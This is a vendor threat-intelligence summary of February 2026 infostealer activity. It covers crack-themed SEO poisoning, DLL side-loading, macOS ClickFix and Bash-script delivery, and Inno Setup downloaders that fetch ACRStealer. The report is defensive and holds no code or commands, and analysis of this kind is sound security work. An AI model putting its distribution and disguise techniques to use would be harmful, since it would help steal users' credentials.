February 2026 Infostealer Trend Report
This report provides statistics, trends, and case information regarding the no. of malware distribution cases, distribution methods, and disguise techniques for Infostealer collected and analyzed during the month of February 2026. Below is a summary of the report’s original content.
1) Data Sources and Collection Methods
AhnLab SEcurity intelligence Center (ASEC) operates various systems capable of automatically collecting malware in circulation to proactively counter Infostealer. Collected malware undergoes analysis via automated systems to determine its malicious nature and identify C2 information. Related information is provided in real-time through the ATIP real-time IOC service and can also be found in the associated information section of the ATIP file analysis information page.
AhnLab’s self-built systems
- automated collection system for malware disguised as cracks
- email honeypot system
- Malware C2 automatic analysis system
ATIP Real-time IOC service
C2 and Malware Type Analysis Information
- File Analysis Information – Related Information – Contacted URLs
The statistics in this report are recommended for use in identifying trends in the overall no. of malware distribution cases, disguise techniques, and distribution methods of Infostealer.
2) Infostealer disguised as cracks
These statistics pertain to information-stealing malware disguised as illegal programs such as cracks and keygens. It is distributed using a strategy called SEO Poisoning, which ensures the malware distribution posts appear high in search engine results. ASEC has established a system to automatically collect malware distributed via this method and analyze C2 information, enabling real-time blocking of malware C2s and providing related information through ATIP. In February, ACRStealer, LummaC2, and Vidar Infostealer were primarily distributed.
Figure 1. Malware Distribution Page
The quantity of malware distributed in this manner over the past year is shown in the following chart. The second legend indicates the quantity of malware that did not have relevant information on VirusTotal at the time of collection, meaning that AhnLab collected this malware more quickly. It can be seen that the majority of the malware was first collected and addressed through the automated collection system.
Chart 1. Annual Malware Distribution Quantity
Previously, attackers wrote malware distribution posts directly on blogs they created, but, search engines have begun to take measures to prevent these malicious blogs from appearing in search results. Attackers are now distributing malware by writing posts on legitimate sites to bypass this. They utilize popular forums or Q&A pages of specific companies, bulletin boards, comments, etc., and, the figure below is an example of malware distribution posts uploaded to various sites. Posts uploaded in this manner are displayed at the top of search engine results, allowing many users to visit. Recently, there has been an increase in cases where attackers target poorly managed WordPress sites to create distribution posts.
Figure 2. Distribution post posted on a website in South Korea
The execution types of Infostealer distributed as above include those distributed as EXE files and those using the DLL SideLoading technique. This technique involves placing a legitimate EXE file and a malicious DLL file in the same folder, causing the malicious DLL to load when the legitimate EXE is executed. Malware detected during February comprised approximately 74.8% EXE-type and 25.2% DLL Sideloading-type, showing a slight decrease in the DLL Sideloading method compared to the previous month. Malware using DLL SideLoading is crafted by modifying only a portion of the original legitimate DLL with malicious code. Since the outward appearance differs little from the legitimate original, many security products classify it as a legitimate file, necessitating caution.
While Windows-based Infostealer of the above type are distributed in Windows environments, accessing the distribution page in a macOS environment triggers the distribution of macOS-specific infostealers. macOS distribution primarily employs the ClickFix technique, which copies malicious commands and prompts execution via Terminal, or induces users to download and execute malicious Bash scripts to distribute the Infostealer. The final executed Infostealer are predominantly distributed as Fatbin executable files or types implemented via osascript. Unlike Windows distribution, they exhibit extremely rapid sample mutation rates. While performing identical functions, the malware’s hash values change within minutes or hours.
Figure 4. Example of a macOS Infostealer distribution page
The collection status of macOS Infostealer over the past six months is as follows. In February, 2,073 Bash scripts and 217 Fatbin executables were collected, along with 31 C2 domains.
Chart 2. macOS Infostealer collection statistics
Trend #1
– Inno Setup Downloader Malware
This type of malware first appeared in June 2024. It is a downloader-type malware configured to distribute malicious code by exploiting the Inno Setup installer. Related details were previously introduced via the ASEC blog at the time.
Initially, a single landing page variant was consistently used for distribution. However, recent campaigns employ multiple versions of landing pages. This type remained largely unnoticed for some time, overshadowed by other distribution methods. Recently, though, both the volume of distribution and the number of infections have surged significantly. In January, 5,323 pieces of malware were distributed, and in February, 13,211 pieces of malware were distributed.
Figure 4. Malware Distribution Landing Page
Meanwhile, similar to the initial distribution, a legitimate WinRAR installation file is downloaded for a period of time in the environment where the malware was downloaded, for the purpose of camouflage.
Figure 5. Legitimate file distribution (top), Malware distribution (bottom)
Executing the malicious code inside the downloaded compressed file generates an installer UI like the one below. Clicking the ‘Next’ button downloads and executes the malicious code. The malicious code executed at this point uses PowerShell commands to download and execute multiple additional malicious programs, including the ACRStealer Infostealer. Additionally, malicious programs such as Proxyware and Tor proxy, along with the legitimate Opera browser installation, were also confirmed.
Figure 6. Malicious code execution screen
Detailed information not covered in this summary, including statistics on the disguised target companies used in malware creation, original filename statistics, distribution source statistics, product detection volume statistics, and phishing email-related information concerning the infostealer, can be found in the original ATIP report.
